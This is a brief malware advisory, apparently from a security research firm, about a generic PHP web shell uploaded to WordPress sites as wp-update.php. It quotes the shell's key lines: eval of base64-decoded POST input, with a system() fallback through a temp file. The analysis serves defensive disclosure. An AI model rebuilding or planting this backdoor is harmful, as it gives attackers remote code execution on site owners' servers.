New Generic PHP Shell Malware In The Wild
BackgroundMassive infection in the form of new generic PHP shell has been, recently, detected by Quttera malware researchers. We are still investigating all the incidents to find out the exact infection vector. Here is what we know so far:
- In most cases this shell was uploaded as wp-update.php to WordPress root directory
- This is generic shell script and it executes content that is provided in $_POST argument calls "sam"
How this shell works
- Firstly it resets last time when it was accessed using @touch function
- Then it checks if "eval" function is available via execution of the following command: $l = eval("return true")
- After that, it decides how to execute encoded script provided inside $_POST[sam] variable
- If eval function is available, then infection is delivered using following expression: eval(base64_decode($_POST[sam]))
- If eval command is not available, then shell dumps provided execution script into temporary file _ptemp and executes it using "system" command: system("php _ptemp;rm _ptemp");
- The injected infection body depends on input provided in $_POST[sam] variable.